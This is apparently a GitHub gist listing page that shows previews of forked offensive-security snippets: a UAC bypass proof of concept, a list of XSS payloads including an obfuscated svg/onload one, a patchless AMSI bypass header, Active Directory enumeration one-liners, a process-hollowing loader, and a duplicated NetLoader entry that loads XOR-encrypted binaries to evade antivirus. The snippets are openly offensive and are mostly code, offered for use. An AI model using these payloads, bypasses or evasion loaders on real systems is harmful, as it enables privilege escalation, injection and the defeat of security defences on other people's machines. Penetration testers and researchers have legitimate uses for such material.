barry Barriuso
Barriuso
/ TaskManagerSecret.c
Created
September 6, 2023 14:00
— forked from antonioCoco/TaskManagerSecret.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| TaskManagerSecret | |
| Author: @splinter_code | |
| This is a very ugly POC for a very unreliable UAC bypass through some UI hacks. | |
| The core of this hack is stealing and using a token containing the UIAccess flag set. | |
| A trick described by James Forshaw, so all credits to him --> https://www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html | |
| From there it uses a task manager "feature" to run a new High IL cmd.exe. | |
| This has been developed only for fun and shouldn't be used due to its high unreliability. |
Barriuso
/ Simple XSS payloads
Created
August 25, 2023 12:55
— forked from sapran/Simple XSS payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " onfocus="alert(1)" name="bounty | |
| (Append #bounty to the URL and enjoy your zero interaction XSS ) | |
| <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// | |
| # Internet Explorer, Edge | |
| <svg><script>alert(1)<p> | |
| # Firefox |
Barriuso
/ patchless_amsi.h
Created
April 13, 2023 11:02
— forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #ifndef PATCHLESS_AMSI_H | |
| #define PATCHLESS_AMSI_H | |
| #include <windows.h> | |
| static const int AMSI_RESULT_CLEAN = 0; | |
| PVOID g_amsiScanBufferPtr = nullptr; | |
| unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) { |
Barriuso
/ 1) Active Directory One Liners
Created
October 4, 2022 15:15
— forked from w00tc/1) Active Directory One Liners
Some Pentesting Notes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
| ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
| Grab Forest Trusts. | |
| ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
Barriuso
/ process-hollowing.cs
Created
March 12, 2021 10:53
— forked from med0x2e/process-hollowing.cs
Process Hollowing (slightly updated to work with G2JS) - credits for the initial code go to @smgorelik and @ambray
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| namespace Hollowing | |
| { | |
| public class Loader | |
| { | |
| public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe"); |
Barriuso
/ NetLoader.cs
Created
June 9, 2020 09:40
— forked from Arno0x/NetLoader.cs
Partial rewrite of @Flangvik NetLoader. Supports proxy with authentication, XOR encrypted binaries, multiple arguments passing to binary.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| Completely based on @Flangvik netloader | |
| This partial rewrite of @Flangvik Netloader includes the following changes: | |
| - Allow loading of an XOR encrypted binary to bypass antiviruses | |
| To encrypt the initial binary you can use my Python transformFile.py script. | |
| Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor | |
Barriuso
/ NetLoader.cs
Created
June 9, 2020 09:40
— forked from Arno0x/NetLoader.cs
Partial rewrite of @Flangvik NetLoader. Supports proxy with authentication, XOR encrypted binaries, multiple arguments passing to binary.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| Completely based on @Flangvik netloader | |
| This partial rewrite of @Flangvik Netloader includes the following changes: | |
| - Allow loading of an XOR encrypted binary to bypass antiviruses | |
| To encrypt the initial binary you can use my Python transformFile.py script. | |
| Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor | |